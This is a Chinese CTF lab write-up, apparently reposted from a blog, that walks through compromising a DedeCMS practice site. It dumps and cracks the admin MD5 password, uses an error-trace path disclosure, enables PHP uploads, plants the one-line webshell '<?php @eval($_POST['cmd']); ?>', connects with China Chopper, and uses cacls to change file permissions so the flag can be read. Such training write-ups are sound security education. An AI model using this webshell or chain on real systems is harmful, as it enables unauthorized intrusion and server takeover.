码迷,mamicode.com
首页 > 其他好文 > 详细

真的很简单

时间:2019-07-21 01:51:52      阅读:188      评论:0      收藏:0      [点我收藏+]

标签:字符串   mysql   filename   txt   漏洞   标题   eval   ebs   href   

首先打开界面

技术图片

发现没有提示给我们的dedeCMS工具,所以这里我们自己下载

http://file.ichunqiu.com/49ba59ab

技术图片

再打开dedeCMS,粘贴上他给我们的网站

技术图片

点一键爆。。。。就可以得到推荐那里显示的账号与密码,不过密码是md5加密

解密后是only_system,则only_system就是我们要找的密码,用户名就ichunqiu

再做第二题,试了试御剑,好像扫不出来,只能用搜到的方法:使用

/data/mysqli_error_trace.inc来利用后台地址信息泄露的漏洞

技术图片

得到返回页,则lichunqiul为后台目录名

再第三题

我们直接http://www.test.ichunqiu/lichunqiul/进去

技术图片

用户名与密码就第一题破解出来的

输入之后登录

技术图片

再在系统—系统基本参数—附件设置中添加php类型的文件

技术图片

这样我们就可以上传我们的一句话木马了(更改后别忘了下面点确定)

在桌面上新建一个txt然后重命名为test.php然后内容输入为我们的一句话木马

 <?php @eval($_POST[‘cmd‘]); ?>

技术图片

写好后在网页后台中选择核心—上传新文件就可以上传我们的一句话木马了

(选择类型为其他说明标题为test.php点浏览选择桌面上的test.php)

保存后再选择更改我们的木马就可以看见我们的木马路径了

技术图片

技术图片

点击查看,然后复制url路径,再使用菜刀(在桌面toolswebshell里面)

右键菜刀白板然后点新建(添加),补足信息

技术图片

点添加,再双击连接就可以进入了

再依次点击c盘——文档与设置——管理者——桌面,就可以看到一个flagtxt文本

技术图片

不过这里我们暂时看不了里面的内容,可能权限不够

我们直接在木马连接处右键然后点击虚拟终端进入后台cmd

技术图片

输入cd C:\Documents and Settings\Administrator\桌面\进入桌面文件夹

技术图片

再输入 type flag~ichunqiu.txt查看试试

技术图片

返回拒绝访问,果然我们的权限不够

使用cacls命令看看权限:cacls flag~ichunqiu.txt

技术图片

果然我们的NT AUTHORITY\SYSTEM栏为N,意思是none

这里我们直接更改他的设置就行了

输入cacls flag~ichunqiu.txt /E /P system:F /C就可以更改他的设置了

技术图片

再次输入cacls flag~ichunqiu.txt查看权限

技术图片

果然我们的NT AUTHORITY\SYSTEM栏就改为F

我们再次输入type  flag~ichunqiu.txt进行查看

技术图片

就可以看到flag

key{il2o3l}

这里的flagil2o3l,需要把key{}去掉

就可以得到100分了

技术图片

 

这里再补充一下cacls的用法

R 读取
W 写入
C 更改(写入)
F 完全控制
cacls用法可通过cmd直接查看,具体如下:
显示或者修改文件的访问控制列表(ACL)

 CACLS filename [/T] [/M] [/L] [/S[:SDDL]] [/E] [/C] [/G user:perm]
        [/R user [...]] [/P user:perm [...]] [/D user [...]]
    filename      显示 ACL。
    /T            更改当前目录及其所有子目录中
                  指定文件的 ACL。
    /L            对照目标处理符号链接本身
    /M            更改装载到目录的卷的 ACL
    /S            显示 DACL 的 SDDL 字符串。
    /S:SDDL       使用在 SDDL 字符串中指定的 ACL 替换 ACL。
                  (/E、/G、/R、/P 或 /D 无效)。
    /E            编辑 ACL 而不替换。
    /C            在出现拒绝访问错误时继续。
    /G user:perm  赋予指定用户访问权限。
                  Perm 可以是: R  读取
                               W  写入
                               C  更改(写入)
                               F  完全控制
    /R user       撤销指定用户的访问权限(仅在与 /E 一起使用时合法)。
    /P user:perm  替换指定用户的访问权限。
                  Perm 可以是: N  无
                               R  读取
                               W  写入
                               C  更改(写入)
                               F  完全控制
    /D user       拒绝指定用户的访问。
 在命令中可以使用通配符指定多个文件。
 也可以在命令中指定多个用户。

缩写:
    CI - 容器继承。
         ACE 会由目录继承。
    OI - 对象继承。
         ACE 会由文件继承。
    IO - 只继承。
         ACE 不适用于当前文件/目录。
    ID - 已继承。
         ACE 从父目录的 ACL 继承。

  

 

真的很简单

标签:字符串   mysql   filename   txt   漏洞   标题   eval   ebs   href   

原文地址:https://www.cnblogs.com/wosun/p/11219888.html

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!